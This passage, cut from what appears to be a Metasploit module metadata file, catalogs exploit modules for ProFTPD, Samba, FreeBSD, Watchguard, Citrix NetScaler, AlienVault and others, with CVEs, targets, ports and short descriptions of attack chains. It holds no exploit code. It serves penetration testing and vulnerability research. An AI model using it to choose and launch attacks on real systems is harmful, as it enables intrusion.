"autofilter_services": [
"http",
"https"
],
"targets": [
"BSDi/4.3 Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/bsdi/softcart/mercantec_softcart.rb",
"is_install_path": true,
"ref_name": "bsdi/softcart/mercantec_softcart",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_dialup/multi/login/manyargs": {
"name": "System V Derived /bin/login Extraneous Arguments Buffer Overflow",
"full_name": "exploit/dialup/multi/login/manyargs",
"rank": 400,
"disclosure_date": "2001-12-12",
"type": "exploit",
"author": [
"I)ruid <druid@caughq.org>"
],
"description": "This exploit connects to a system's modem over dialup and exploits\n a buffer overflow vulnerability in its System V derived /bin/login.\n The vulnerability is triggered by providing a large number of arguments.",
"references": [
"CVE-2001-0797",
"OSVDB-690",
"OSVDB-691",
"BID-3681",
"URL-http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html",
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html"
],
"platform": "Unix",
"arch": "tty",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Solaris 2.6 - 8 (SPARC)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/dialup/multi/login/manyargs.rb",
"is_install_path": true,
"ref_name": "dialup/multi/login/manyargs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_firefox/local/exec_shellcode": {
"name": "Firefox Exec Shellcode from Privileged Javascript Shell",
"full_name": "exploit/firefox/local/exec_shellcode",
"rank": 600,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows execution of native payloads from a privileged Firefox Javascript shell.\n It places the specified payload into memory, adds the necessary protection flags,\n and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter\n session without touching the disk.",
"references": [
],
"platform": "Firefox",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/firefox/local/exec_shellcode.rb",
"is_install_path": true,
"ref_name": "firefox/local/exec_shellcode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/ftp/proftp_telnet_iac": {
"name": "ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)",
"full_name": "exploit/freebsd/ftp/proftp_telnet_iac",
"rank": 500,
"disclosure_date": "2010-11-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in ProFTPD\n server versions 1.3.2rc3 through 1.3.3b. By sending data containing a\n large number of Telnet IAC commands, an attacker can corrupt memory and\n execute arbitrary code.",
"references": [
"CVE-2010-4221",
"OSVDB-68985",
"BID-44562"
],
"platform": "BSD",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"Debug",
"ProFTPD 1.3.2a Server (FreeBSD 8.0)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb",
"is_install_path": true,
"ref_name": "freebsd/ftp/proftp_telnet_iac",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/http/watchguard_cmd_exec": {
"name": "Watchguard XCS Remote Command Execution",
"full_name": "exploit/freebsd/http/watchguard_cmd_exec",
"rank": 600,
"disclosure_date": "2015-06-29",
"type": "exploit",
"author": [
"Daniel Jensen <daniel.jensen@security-assessment.com>"
],
"description": "This module exploits two separate vulnerabilities found in the Watchguard XCS virtual\n appliance to gain command execution. First, by exploiting an unauthenticated SQL injection, a\n remote attacker may insert a valid web user into the appliance database, and get access\n to the web interface. Second, a vulnerability in the web interface allows the\n attacker to inject operating system commands as the 'nobody' user.",
"references": [
"CVE-2015-5453",
"URL-http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf"
],
"platform": "BSD",
"arch": "x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Watchguard XCS 9.2/10.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/freebsd/http/watchguard_cmd_exec.rb",
"is_install_path": true,
"ref_name": "freebsd/http/watchguard_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_freebsd/local/intel_sysret_priv_esc": {
"name": "FreeBSD Intel SYSRET Privilege Escalation",
"full_name": "exploit/freebsd/local/intel_sysret_priv_esc",
"rank": 500,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"Rafal Wojtczuk",
"John Baldwin",
"iZsh",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the FreeBSD kernel,\n when running on 64-bit Intel processors.\n\n By design, 64-bit processors following the X86-64 specification will\n trigger a general protection fault (GPF) when executing a SYSRET\n instruction with a non-canonical address in the RCX register.\n\n However, Intel processors check for a non-canonical address prior to\n dropping privileges, causing a GPF in privileged mode. As a result,\n the current userland RSP stack pointer is restored and executed,\n resulting in privileged code execution.\n\n This module has been tested successfully on:\n\n FreeBSD 8.3-RELEASE (amd64); and\n FreeBSD 9.0-RELEASE (amd64).",
"references": [
"BID-53856",
"CVE-2012-0217",
"EDB-28718",
"PACKETSTORM-113584",
"URL-https://www.freebsd.org/security/patches/SA-12:04/sysret.patch",
"URL-https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/",
"URL-https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c",
"URL-https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/",
"URL-http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc",
"URL-https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation"
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-12-21 15:40:01 +0000",
"path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/intel_sysret_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/local/mmap": {
"name": "FreeBSD 9 Address Space Manipulation Privilege Escalation",
"full_name": "exploit/freebsd/local/mmap",
"rank": 500,
"disclosure_date": "2013-06-18",
"type": "exploit",
"author": [
"Konstantin Belousov",
"Alan Cox",
"Hunger",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability that can be used to modify portions of\n a process's address space, which may lead to privilege escalation. Systems\n such as FreeBSD 9.0 and 9.1 are known to be vulnerable.",
"references": [
"CVE-2013-2171",
"OSVDB-94414",
"EDB-26368",
"BID-60615",
"URL-http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc"
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"FreeBSD x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/local/mmap.rb",
"is_install_path": true,
"ref_name": "freebsd/local/mmap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/local/watchguard_fix_corrupt_mail": {
"name": "Watchguard XCS FixCorruptMail Local Privilege Escalation",
"full_name": "exploit/freebsd/local/watchguard_fix_corrupt_mail",
"rank": 0,
"disclosure_date": "2015-06-29",
"type": "exploit",
"author": [
"Daniel Jensen <daniel.jensen@security-assessment.com>"
],
"description": "This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called\n by root's crontab which can be exploited to run a command as root within 3 minutes.",
"references": [
"URL-http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf"
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Watchguard XCS 9.2/10.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb",
"is_install_path": true,
"ref_name": "freebsd/local/watchguard_fix_corrupt_mail",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/misc/citrix_netscaler_soap_bof": {
"name": "Citrix NetScaler SOAP Handler Remote Code Execution",
"full_name": "exploit/freebsd/misc/citrix_netscaler_soap_bof",
"rank": 300,
"disclosure_date": "2014-09-22",
"type": "exploit",
"author": [
"Bradley Austin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.\n The vulnerability exists in the SOAP handler, accessible through the web interface. A\n malicious SOAP request can force the handler to connect to a malicious NetScaler config\n server. This malicious config server can send a specially crafted response in order to\n trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary\n code with the privileges of the web server running the SOAP handler. This module has been\n tested successfully on the NetScaler Virtual Appliance 450010.",
"references": [
"URL-http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html"
],
"platform": "BSD",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NetScaler Virtual Appliance 450010"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb",
"is_install_path": true,
"ref_name": "freebsd/misc/citrix_netscaler_soap_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/samba/trans2open": {
"name": "Samba trans2open Overflow (*BSD x86)",
"full_name": "exploit/freebsd/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the flaw on x86 Linux systems that do not\n have the noexec stack option set.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "BSD",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/freebsd/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "freebsd/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/tacacs/xtacacsd_report": {
"name": "XTACACSD report() Buffer Overflow",
"full_name": "exploit/freebsd/tacacs/xtacacsd_report",
"rank": 200,
"disclosure_date": "2008-01-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By\n sending a specially crafted XTACACS packet with an overly long\n username, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-7232",
"OSVDB-58140",
"URL-http://aluigi.altervista.org/adv/xtacacsdz-adv.txt"
],
"platform": "BSD",
"arch": "x86",
"rport": 49,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"FreeBSD 6.2-Release Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/tacacs/xtacacsd_report.rb",
"is_install_path": true,
"ref_name": "freebsd/tacacs/xtacacsd_report",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_freebsd/telnet/telnet_encrypt_keyid": {
"name": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow",
"full_name": "exploit/freebsd/telnet/telnet_encrypt_keyid",
"rank": 500,
"disclosure_date": "2011-12-23",
"type": "exploit",
"author": [
"Jaime Penalba Estebanez <jpenalbae@gmail.com>",
"Brandon Perry <bperry.volatile@gmail.com>",
"Dan Rosenberg",
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in the encryption option handler of the\n FreeBSD telnet service.",
"references": [
"CVE-2011-4862",
"OSVDB-78020",
"BID-51182",
"EDB-18280"
],
"platform": "BSD",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": [
"Automatic",
"FreeBSD 8.2",
"FreeBSD 8.1",
"FreeBSD 8.0",
"FreeBSD 7.3/7.4",
"FreeBSD 7.0/7.1/7.2",
"FreeBSD 6.3/6.4",
"FreeBSD 6.0/6.1/6.2",
"FreeBSD 5.5",
"FreeBSD 5.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb",
"is_install_path": true,
"ref_name": "freebsd/telnet/telnet_encrypt_keyid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_hpux/lpd/cleanup_exec": {
"name": "HP-UX LPD Command Execution",
"full_name": "exploit/hpux/lpd/cleanup_exec",
"rank": 600,
"disclosure_date": "2002-08-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploit abuses an unpublished vulnerability in the\n HP-UX LPD service. This flaw allows an unauthenticated\n attacker to execute arbitrary commands with the privileges\n of the root user. The LPD service is only exploitable when\n the address of the attacking system can be resolved by the\n target. This vulnerability was silently patched with the\n buffer overflow flaws addressed in HP Security Bulletin\n HPSBUX0208-213.",
"references": [
"CVE-2002-1473",
"OSVDB-9638",
"URL-http://archives.neohapsis.com/archives/hp/2002-q3/0064.html"
],
"platform": "HPUX,Unix",
"arch": "cmd",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/hpux/lpd/cleanup_exec.rb",
"is_install_path": true,
"ref_name": "hpux/lpd/cleanup_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_irix/lpd/tagprinter_exec": {
"name": "Irix LPD tagprinter Command Execution",
"full_name": "exploit/irix/lpd/tagprinter_exec",
"rank": 600,
"disclosure_date": "2001-09-01",
"type": "exploit",
"author": [
"optyx <optyx@no$email.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution flaw in\n the in.lpd service shipped with all versions of Irix.",
"references": [
"CVE-2001-0800",
"OSVDB-8573"
],
"platform": "Irix,Unix",
"arch": "cmd",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/irix/lpd/tagprinter_exec.rb",
"is_install_path": true,
"ref_name": "irix/lpd/tagprinter_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/antivirus/escan_password_exec": {
"name": "eScan Web Management Console Command Injection",
"full_name": "exploit/linux/antivirus/escan_password_exec",
"rank": 600,
"disclosure_date": "2014-04-04",
"type": "exploit",
"author": [
"Joxean Koret",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in the eScan Web Management\n Console. The vulnerability exists while processing CheckPass login requests. An attacker\n with a valid username can use a malformed password to execute arbitrary commands. With\n mwconf privileges, the runasroot utility can be abused to get root privileges. This module\n has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.",
"references": [
"URL-http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz"
],
"platform": "Linux",
"arch": "x86",
"rport": 10080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"eScan 5.5-2 / Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/antivirus/escan_password_exec.rb",
"is_install_path": true,
"ref_name": "linux/antivirus/escan_password_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/browser/adobe_flashplayer_aslaunch": {
"name": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability",
"full_name": "exploit/linux/browser/adobe_flashplayer_aslaunch",
"rank": 400,
"disclosure_date": "2008-12-17",
"type": "exploit",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "This module exploits a vulnerability in Adobe Flash Player for Linux,\n versions 10.0.12.36 and 9.0.151.0 and prior.\n An input validation vulnerability allows command execution when the browser\n loads a SWF file which contains shell metacharacters in the arguments to\n the ActionScript launch method.\n\n The victim must have Adobe AIR installed for the exploit to work. This module\n was tested against version 10.0.12.36 (10r12_36).",
"references": [
"CVE-2008-5499",
"OSVDB-50796",
"BID-32896",
"URL-http://www.adobe.com/support/security/bulletins/apsb08-24.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb",
"is_install_path": true,
"ref_name": "linux/browser/adobe_flashplayer_aslaunch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ftp/proftp_sreplace": {
"name": "ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",
"full_name": "exploit/linux/ftp/proftp_sreplace",
"rank": 500,
"disclosure_date": "2006-11-26",
"type": "exploit",
"author": [
"Evgeny Legerov <admin@gleg.net>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions 1.2 through\n 1.3.0 of the ProFTPD server. The vulnerability is within the \"sreplace\" function\n within the \"src/support.c\" file.\n\n The off-by-one heap overflow bug in the ProFTPD sreplace function was\n discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit\n this off-by-one bug via the MKD command, but failed. We did not work on this bug\n since then.\n\n Actually, there exist at least two bugs in the sreplace function: one is the\n mentioned off-by-one heap overflow bug, the other is a stack-based buffer overflow\n via 'sstrncpy(dst,src,negative argument)'.\n\n We were unable to reach the \"sreplace\" stack bug on ProFTPD 1.2.10 stable\n version, but the version 1.3.0rc3 introduced some interesting changes, among them:\n\n 1. another (integer) overflow in sreplace!\n 2. now it is possible to reach sreplace stack-based buffer overflow bug via\n the \"pr_display_file\" function!\n 3. stupid '.message' file display bug\n\n So we decided to choose ProFTPD 1.3.0 as a target for our exploit.\n To reach the bug, you need to upload a specially created .message file to a\n writeable directory, then do \"CWD <writeable directory>\" to trigger the invocation\n of the sreplace function.\n\n Note that ProFTPD 1.3.0rc3 introduced a stupid bug: to display the '.message'\n file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.\n\n The exploit has been a part of the VulnDisco Pack since Dec 2005.",
"references": [
"CVE-2006-5815",
"OSVDB-68985",
"BID-20992",
"URL-https://seclists.org/bugtraq/2006/Nov/94",
"URL-https://seclists.org/bugtraq/2006/Nov/538",
"URL-http://bugs.proftpd.org/show_bug.cgi?id=2858",
"URL-http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h"
],
"platform": "Linux",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"Debug",
"ProFTPD 1.3.0 (source install) / Debian 3.1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/ftp/proftp_sreplace.rb",
"is_install_path": true,
"ref_name": "linux/ftp/proftp_sreplace",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ftp/proftp_telnet_iac": {
"name": "ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",
"full_name": "exploit/linux/ftp/proftp_telnet_iac",
"rank": 500,
"disclosure_date": "2010-11-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions of the ProFTPD\n server between 1.3.2rc3 and 1.3.3b. By sending data containing a\n large number of Telnet IAC commands, an attacker can corrupt memory and\n execute arbitrary code.\n\n The Debian Squeeze version of the exploit uses a little ROP stub to indirectly\n transfer the flow of execution to a pool buffer (the cmd_rec \"res\" in\n \"pr_cmd_read\").\n\n The Ubuntu version uses a ROP stager to mmap RWX memory, copy a small stub\n to it, and execute the stub. The stub then copies the remainder of the payload\n in and executes it.\n\n NOTE: Most Linux distributions either do not ship a vulnerable version of\n ProFTPD, or they ship a version compiled with stack smashing protection.\n\n Although SSP significantly reduces the probability of a single attempt\n succeeding, it will not prevent exploitation. Since the daemon forks in a\n default configuration, the cookie value will remain the same despite\n some attempts failing. By making repeated requests, an attacker can eventually\n guess the cookie value and exploit the vulnerability.\n\n The cookie in Ubuntu has 24 bits of entropy. This reduces the effectiveness\n and could allow exploitation in a semi-reasonable amount of time.",
"references": [
"CVE-2010-4221",
"OSVDB-68985",
"BID-44562"
],
"platform": "Linux",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"Debug",
"ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1",
"ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)",
"ProFTPD 1.3.2c Server (Ubuntu 10.04)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/ftp/proftp_telnet_iac.rb",
"is_install_path": true,
"ref_name": "linux/ftp/proftp_telnet_iac",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/games/ut2004_secure": {
"name": "Unreal Tournament 2004 \"secure\" Overflow (Linux)",
"full_name": "exploit/linux/games/ut2004_secure",
"rank": 400,
"disclosure_date": "2004-06-18",
"type": "exploit",
"author": [
"onetwo"
],
"description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.",
"references": [
"CVE-2004-0608",
"OSVDB-7217",
"BID-10570"
],
"platform": "Linux",
"arch": "",
"rport": 7787,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"UT2004 Linux Build 3120",
"UT2004 Linux Build 3186"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/games/ut2004_secure.rb",
"is_install_path": true,
"ref_name": "linux/games/ut2004_secure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/accellion_fta_getstatus_oauth": {
"name": "Accellion FTA getStatus verify_oauth_token Command Execution",
"full_name": "exploit/linux/http/accellion_fta_getstatus_oauth",
"rank": 600,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a metacharacter shell injection vulnerability in the Accellion\n File Transfer appliance. This vulnerability is triggered when a user-provided\n 'oauth_token' is passed into a system() call within a mod_perl handler. This\n module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include\n '/seos/find.api', '/seos/put.api', and '/seos/mput.api'. This issue was confirmed on\n version FTA_9_11_200, but may apply to previous versions as well. This issue was\n fixed in software update FTA_9_11_210.",
"references": [
"URL-http://r-7.co/R7-2015-08",
"CVE-2015-2857"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb",
"is_install_path": true,
"ref_name": "linux/http/accellion_fta_getstatus_oauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/advantech_switch_bash_env_exec": {
"name": "Advantech Switch Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/linux/http/advantech_switch_bash_env_exec",
"rank": 600,
"disclosure_date": "2015-12-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the 'ping.sh' CGI\n script, accessible through the Boa web server on Advantech switches. This module\n was tested against firmware version 1322_D1.98.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2018-09-17 22:29:20 +0000",
"path": "/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/advantech_switch_bash_env_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_linux/http/airties_login_cgi_bof": {
"name": "Airties login-cgi Buffer Overflow",
"full_name": "exploit/linux/http/airties_login_cgi_bof",
"rank": 300,
"disclosure_date": "2015-03-31",
"type": "exploit",
"author": [
"Batuhan Burakcin <batuhan@bmicrosystems.com>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote buffer overflow vulnerability on several Airties routers.\n The vulnerability exists in the handling of HTTP queries to the login cgi with long\n redirect parameters. The vulnerability doesn't require authentication. This module has\n been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.\n Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,\n Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.",
"references": [
"CVE-2015-2797",
"EDB-36577",
"URL-http://www.bmicrosystems.com/exploits/airties5650tt.txt"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AirTies_Air5650v3TT_FW_1.0.2.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/airties_login_cgi_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/airties_login_cgi_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/alcatel_omnipcx_mastercgi_exec": {
"name": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",
"full_name": "exploit/linux/http/alcatel_omnipcx_mastercgi_exec",
"rank": 0,
"disclosure_date": "2007-09-09",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\n Communication Server 7.1 and earlier. The Unified Maintenance Tool\n contains a 'masterCGI' binary which allows an unauthenticated attacker\n to execute arbitrary commands by specifying shell metacharacters as the\n 'user' within the 'ping' action to obtain 'httpd' user access. This\n module only supports command line payloads, as the httpd process kills\n the reverse/bind shell spawn after the HTTP 200 OK response.",
"references": [
"OSVDB-40521",
"BID-25694",
"CVE-2007-3010",
"URL-http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/alcatel_omnipcx_mastercgi_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/alienvault_exec": {
"name": "AlienVault OSSIM/USM Remote Code Execution",
"full_name": "exploit/linux/http/alienvault_exec",
"rank": 600,
"disclosure_date": "2017-01-31",
"type": "exploit",
"author": [
"Peter Lapp",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits object injection, authentication bypass and IP spoofing vulnerabilities all together.\n Unauthenticated users can execute arbitrary commands under the context of the root user.\n\n Abusing the authentication bypass issue on gauge.php allows adversaries to exploit an object injection vulnerability\n which leads to a SQL injection attack that leaks an administrator session token. Attackers can create a rogue\n action and policy that enable them to execute operating system commands by using the captured session token. As a final step,\n an SSH login attempt with invalid credentials can trigger the created rogue policy, which triggers an action that executes\n an operating system command with root user privileges.\n\n This module was tested against the following products and versions:\n AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0\n AlienVault OSSIM 5.0.0, 4.6.1",
"references": [
"CVE-2016-8582",
"URL-https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/",
"EDB-40682"
],
"platform": "Python",
"arch": "python",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Alienvault USM/OSSIM <= 5.3.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/alienvault_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/alienvault_exec",
"check": true,
"post_auth": false,
"default_credential": false,
